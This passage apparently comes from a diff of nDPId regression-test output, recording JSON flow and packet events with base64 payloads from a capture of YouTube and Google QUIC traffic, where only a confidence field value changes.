AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823466,"flow_last_seen":1489363823466,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363823466,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823466,"flow_last_seen":1489363823466,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363823466,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}} 00964{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1489363823467,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":427,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":427,"pkt_l4_len":393,"thread_ts_msec":1489363823467,"pkt":"gCqojWksxCwDBkn+CABFAAGdQ1YAAEARAADAqAEH2DrNQtbVAbsBiWjHDZNw4V58RG0IUTAzNQIjOTX0HE3l5Scr7Fgx2f\/r+qyKcH\/8LtiyPftQGYB9rCN29+bVRC8cQk9\/xGvEd6aBS8oqh8NZIxXxQWKlTa8RiJV0BMsIA0J2xai1sihftSstpiUm4Hfb5ePoNWBO9sfumkF4vn\/9w\/9icDJdGccA4OzurorhUAKZSZXQ2C+f4aKf6nX2PELscDc2K8rYtLquJGdtKf4c79ur+nT\/zIZbwAI5FHcm2kTejfWn+vqhJAD0GuZjr1fez\/qk2C34VbRcKzU+r3sMaPUtMdGtgzscnCkXVApYI9m9bd3dzj+CzxW8qOJ7mCU2emBxJ\/DIq4W6MZVOQ8P1s290Mflqj2Ld8WgZbVsDG+nGkhewE4Z8dkUPa+UkVgjTddS58Gokmrg9Z3Adl+QFItNyGTCZv48hVxEemek454JnWb6oZl4ujKpXhQA0CaX5LNroX5y5o\/Wny9SJ17j8aIxrDR0s65vzthwadNOZLJ62NA+MTWY0IQjOuA=="} 02268{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1489363823527,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363823527,"pkt":"xCwDBkn+gCqojWksCABFAAViAABAADcR117YOs1CwKgBBwG71tUFTuocBCh3B7XiTuKXN4LFlWznTXqPOMTIP1YB45lXi+l5CF8JASyEKKaDONFN5YR3rA\/p9CKVXhUMWNxz3dKUg1yQftOAuLAuCFZHEo433jmLn2X4f\/Owuck2m9UesvdXoxzwq4xDpUXHvNH9PzNMS1XtEZ0KDZ904pHEN+ZkjUiA2jK\/AWrBBVjEsqHcAMngSVXjIyTLuIfTfT50KGoQr9mSm5SWUDtU4w+2DwTLde4slXrVb5tsrZJ9hx6FXeBCOwNcjEoeHA7do276\/9KH1k58X3zu+PQcEwnHQBIs5Nvjxz0m7lZ\/e4WfsWAx90HOH6likwa4aRKygVjLaiXObj1BRuaQFXdbITUHeb\/v1Bb0ex9qIwx0kcogAUVq6KGcRlImR2VCET7Q2UPfBF1HkA3bAqvJ6t1BP07HS8IKIEm70QgionKkRzGiFzdUhT09R6zdeXllUpiA63fBrBRfZD4ih6nX4zo\/yc\/lz+z\/tYWWCPtitjIx3R+MsYy6evVwKHmKh4xLbNgtf6Bu5FREacax96iyQP2\/vuAdKPy+I6gMbTz04jy4zg2nTKOKHNa3aAGNL9B3Uh5t6mqJXuzsLfLLTPDw3wrJPan+M\/0XoefuuxvaucM7CeSe1bcynXGH+VeCKK3X6BEjxAIAyaIH3WN4GasKfIjmi2abIP71bMldE4Rrc0QpuysWWFnpQQt9pN2sP40R1CWaJEjWn2UIOe0P10GgnLa0xDEY45T4mm1G5cRaybTY1lDhwEfyXyWZ9AZfiHELWMCRxQrjRsfwPjDlL6jHi\/zHIUWOI\/T4jgDqU2KclKtGJHvbzyipTcTSry1Z9gmEkVPVvz\/8EjMnwGHjnltQ6Dn6FOkOgVFgA2iD5qiIgNLtjkUfH1GBvC5KbT9MfqpK2j2k4rSt9zbnBWSsgHnKyvlhVlk4OSMFjMkESHpv2MoP7kPpHn9hYZR+DGSK3WZiE2JTywLeaTFpsQZ3daTQq1Vr04zxtlC9vRWSZgVtzp+73FUoayEpGTdeO3UERRAep7Gz6OHwglh0vTs4C4cI3glPhuREbf69JIx21MPWU3j5sPCPzg7nPp1rI9ewTvRn38IUIjcvV1KuUH4IRVmz5W6wsHwHFtnkwFNuxtYxLxpK0EDIngGp5d6ht7210ydmiQr6O0ON8qJtc3t5+jXn6ntXD+RhEqv4GCaMWHbVrUNZALDxj9JvSEzyroxEuoApEO8TL\/ZdVC\/slwR1pM3JdbAsWN2rxIFLM5krFwOakRgi754xhdBEry7MgvTwiHsgDJ3Rg3jSdB9jubcVT3HICTRmj1vR\/GLDAyPIFAzuuaVmpolrsQwDxFuyNGOcjHVBUbeP6bnCaCs1JfK35oan09836\/37ZWojhkKHAUoDUCP0eOYnRmUhbwOggCe7+p8hW83\/lILFNK1NDMAm7qAsqoccxqNT61ke0qmot69NhPXpwpGUt\/gK3nyvFne4lsK7S7r1eMvI29rlDBY0L\/e2MX+l+NFFonVbYbxqlVZxk5h57Py0nXsSE5q43RZq\/Ab5Ljnrfv\/qOWasfLkVsR95Ih7otWzubnTYoOB5dgkPlalnkY+ZT0ynhrpD6iNCVYd4popCzZS+uE59ZqtbLuU6i6Oh3yTkUuBN6l4rJS\/6y1YL+YBtywlzVVi2gqoBTO6RyHcXMeDc6anBpSJn+Y11FC9lfnd1ZBuVxPW\/4cBKWMy9IKMGLXE8iIH1zC\/mEqW8ZtRWLvviks2j2E9BFu9ovslgURdyPBgw2o0Whiqb07OoUWWMBoSXHynCDs+gbza+6qUl"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823738,"flow_last_seen":1489363823738,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363823738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02245{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1489363823738,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363823738,"pkt":"gCqojWksxCwDBkn+CABFAAVi1UgAAEARAADAqAEH2DrGIdsKAbsFTmVrDWI\/o1o3gkQjUTAzNQG3J1X3HMsKZ2COv5qgARQFQ0hMTxMAAABQQUQA1AMAAFNOSQDhAwAAVkVSAOUDAABDQ1MA9QMAAE1TUEP5AwAAVUFJRCgEAABUQ0lELAQAAFBETUQwBAAAU1JCRjQEAABTTUhMOAQAAElDU0w8BAAAQ1RJTUQEAABOT05QZAQAAE1JRFNoBAAAU0NMU2wEAABDU0NUbAQAAENPUFRsBAAAQ0ZDV3AEAABTRkNXdAQAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0teXQzLmdncGh0LmNvbVEwMzUB6IFgkpIa6H7tgIaiFYKRZAAAAGJldGEgQ2hyb21lLzU3LjAuMjk4Ny45OCBJbnRlbCBNYWMgT1MgWCAxMF8xMl8zAAAAAFg1MDkAABAAAQAAAB4AAABv48VYAAAAADHS1o9J\/TTNQYjpQh1bWy1pxKNWlJuoLy5bOHLwnEpeZAAAAAEAAAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823738,"flow_last_seen":1489363823738,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363823738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823738,"flow_last_seen":1489363823738,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363823738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}} 02259{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1489363823782,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363823782,"pkt":"xCwDBkn+gCqojWksCABFAAViAABAADUR4H\/YOsYhwKgBBwG72woFTqYeCGI\/o1o3gkQjAfrje9Hje5P995YFE4ABUkVKAAgAAABTVEsAPAAAAFNOTwB0AAAAUFJPRroAAABTQ0ZHWQEAAFJSRUpdAQAAU1RUTGUBAABDU0NUVwIAAENSVP\/\/BQAA+LXECKXyXyaGkNvk1LnkKe2HcwZSdJKMjSZdwRtRvlgkC7wrIojsxa12VSbQ+UqytsSw5ZWrAguctbN84e+itVKKdDan60SbCn6HO8EhAZXhZCoi6zTXVPfruFP+xbK0jobs4P1ETvvj7642AaRXoyX3AiUwRAIga0VZvCZ3TBiWNQTgv6KY8y2d9RkggowYQwi1RHlUtm4CIDUxV08RC49VVgJORrtGSNh+UsyMA8+5V0kTzoS1\/6EyU0NGRwgAAABBRUFECAAAAFNDSUQYAAAAUERNRBwAAABUQktQIAAAAFBVQlNDAAAAS0VYU0cAAABPQklUTwAAAEVYUFlXAAAAQUVTR0NDMjBrdmP1GwKyBEvvwtZJjj6PQ0hJRFRCMTAgAAC7MI00KZ1MP25xAs8ApFxY\/QSpEMcZP7AIDZmbDnFGD0MyNTUwMDAwMDAwMEDbx1gAAAAADAAAAND3AQAAAAAAAPAAdQDuS723dc5guuFCaR+r4Z5mow9+X7By2IMAxHuJeqj9ywAAAVplaZe7AAAEAwBGMEQCIFrxuSR6yQfoERjhpyCo\/HC4DbnJyy5PDUNSQYvoLd7WAiA1du1k\/DfC+hSnbCFZ+CiZL\/WBsCA2tHRh+V5os9e8wAB3AN3rHSt6DU+mIIuBrYFocH4ujp0B1VyIjT0RxM227L7MAAABWmVpmAsAAAQDAEgwRgIhAK1Z+StuHvhEQzbhrizA0oP28zksTi\/aWkPYynKMWI7wAiEAoZsd0Sdt7uEo3XB3wMmgRGZNny2cfedCYnG3zpLag4YBA37tgIaiFYKRAgAAAAMB6IFgkpIa6AAAAAAAKgcAAHi7gTUtv1NjZwCWXOxKBk1sXJA2HIf55ae2MzL3PkFvyFGxkQUqDMwNjIyMgPkFmJfA7TkDUyC2MDUHdaIKsVrFwcPlDEw3aflFeZmJsATJzsPrm1+aVwJKXWGZqeVwd\/EguwvUlgC5i0dcCximIGFgJilKBqbG1Dxw1BtEGgizsQO9e84W2BLhADOYGdmZnRhYMt6FvD+wnV996Zw\/hsoKnDX1AkfE3LjmrmD0Xbj\/45IfeVee\/OywebVOPSnedOpTyamR\/2zN7jmfePP5sO3s0PyvawoWN7GsN2hiWU2oLGtizgMpEGRpYk4FchKbcLm1SUZLL7GgoBiHrApEtiAfzNUrBqaYxPRUqGJgYi4Gq+LT0kvKyU+HKWsSBPILUIWUtEBUbn4eMKcm4jBGE6QGbLcuVIVuSn55Xk5+Ygq6UnVMpaUF2BQqYChEVwEMgJT80qSc1OSczORs9ADgBoZbekEG3F8QzSnAIioVLAQP1+LKvBRo5QWWEIFJlKcm5WSmQ02Q19IrTkxLzSstwBHgYAV5KUn5FTgUKGrpEQoceYQS7IEioYUrJhFa9YpTgUFSgq6AByVW+dGjWYFgJEvhCWxORFDzowe0KPbgEMISyNrFJcB4SNYrSMwDOiE3Mx9f2hXDIS6LPxz4S\/PSMnOA5VFqil5eankxUtuLvcEgA6kEjwGWQdpIZbM8tLgsyM6EGgoukd09Hd2NwIWvNlJxD1MMDC6gj4sNkXWAqgCk9qDW3+B7S2xzw150iDxJLJ4oWT2f5yFamwi5WMfaiVKENDKAtRxaz4WDjS29kQdYohsYQFpFmgbqBqoLlBco"} 02254{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1489363823783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363823783,"pkt":"xCwDBkn+gCqojWksCABFAAViAABAADUR4H\/YOsYhwKgBBwG72woFTtjVCGI\/o1o3gkQjAl1iY1+IPhyu0ittLaQBLgUZARLyTw62Xo9mQ7Tn55dir+alTNnl+EuTXetgrtU\/li3WZUF3t3EtPfqBg1nJrPp7bar7qdPHbjH8jwhk+pimkWuq6rVs4cviafuTL\/pWbDvkJD1zwixjdUFbM0aGipe63\/v0luly7P6xK4d1\/V35zVlHfZnq9OpLDbRdp3F95Wn77GK+6cqsr8cEfY77RjhzSh7Unhdryl2mU\/IhTPRZgsMXhZ65ayI6rm07a3GnaGsF6wp\/3rLVzcqh63smBXkUr5RrfvOpMsbbX\/13ZPXcymfXdeZ+LWmcELGYmfOd+prGpXeZdtiyB0ssnuZwNOYGp72hD8PxC2ds8mZMXnnvqd7Gb2w82Yw3Hn\/6nvVjXthRi\/UnDQF+1X0RAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363824401,"flow_last_seen":1489363824401,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363824401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02253{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1489363824401,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363824401,"pkt":"gCqojWksxCwDBkn+CABFAAVisIYAAEARAADAqAEH2DrNQtJjAbsFTmyMDXhX73QJ\/9nIUTAzNQGC9mpeAxq6QsMNjNmgAQAEQ0hMTx0AAABQQUQACAEAAFNOSQAjAQAAU1RLAF0BAABWRVIAYQEAAENDUwBxAQAATk9OQ5EBAABNU1BDlQEAAEFFQUSZAQAAVUFJRMgBAABTQ0lE2AEAAFRDSUTcAQAAUERNROABAABTUkJG5AEAAFNNSEzoAQAASUNTTOwBAABDVElN9AEAAE5PTlAUAgAAUFVCUzQCAABNSURTOAIAAFNDTFM8AgAAS0VYU0ACAABYTENUSAIAAENTQ1RIAgAAQ09QVEgCAABDQ1JUYAIAAElSVFRkAgAAQ0VUVggDAABDRkNXDAMAAFNGQ1cQAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tZ29vZ2xlYWRzLmcuZG91YmxlY2xpY2submV0gCa63gfstks25NXDBda+jRe1AwMuFIPOgLr8Vdt88WUvAddL7KVg5kyrPLEzz5PxZEMuEuhwybaZ0VEwMzUB6IFgkpIa6H7tgIaiFYKRWMXjcDAwMDAwMDAwQoHc+xZQMEvJrifGGZTcfUn5aXxkAAAAQ0MyMGJldGEgQ2hyb21lLzU3LjAuMjk4Ny45OCBJbnRlbCBNYWMgT1MgWCAxMF8xMl8za3Zj9RsCsgRL78LWSY4+jwAAAABYNTA5AAAQAAEAAAAeAAAAcOPFWAAAAACN\/AA7IChJw\/uFk6rkJtT8KHam\/zP1YJxL1R6PGerdhviM0jsqfVXK1sMGRgIfu1Gw5yjD\/\/Q\/fKW3aZLxbK0ZZAAAAAEAAABDMjU1qvorPqjeOwuq+is+qN47Cz2t9HxBefiRQAt7kKmueet+NAEAgygqfGXu0L2syT5vA8mDxoSqG087cDiVovZ6s0ywmTUWtgw5lXy+Ac4T6qWEMJOPvUqVQrabfhIiKh6bU4h\/Diu+B3D3YFOkHFOA3JEmhpJ\/3PZn9DncBSC36LdWvsJ8Uwgl2IG2lc1SfhMotW8c5gE3wCT8YVfQJL1vCNMKzgZWBrzkDiYZ7cTxYUMsLfK1F7K2mD1WVm4PU008ujahjZ6t1bAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363824401,"flow_last_seen":1489363824401,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363824401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363824401,"flow_last_seen":1489363824401,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1489363824401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"beta Chrome\/57.0.2987.98 Intel Mac OS X 10_12_3"}} 02268{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1489363824401,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1489363824401,"pkt":"gCqojWksxCwDBkn+CABFAAViiX4AAEARAADAqAEH2DrNQtJjAbsFTmyMDXhX73QJ\/9nIUTAzNQL3N20WC4prgrlnEEXpdg0UiWbXJhn9rrqPsD7nypSAi6kAnw8WQDgk9WvHBUMq3ztLT3UfD0gz+me7oBLVs9bjXCdM3vfRP04sqX92qJrBMWJiq3+eKjCNhyA3dhTNbGSGyKI7\/jcHFMipWf2f2NsuOihlYKhTPSCEE\/3dxQ5VpSOD4BfoNhUiG4SLXDgBvtHLX5RXQiz6BGmJPkfw0Dv35AvtRBL6UAIgkl\/K+oTxY08q1VHTawdG6K3aOXtZN79Qa45uh7pT1oVWMplxpgw8JT2Arpn6WXMTVuz7IIjcMmVGkmTbz31c16ROCt97Fg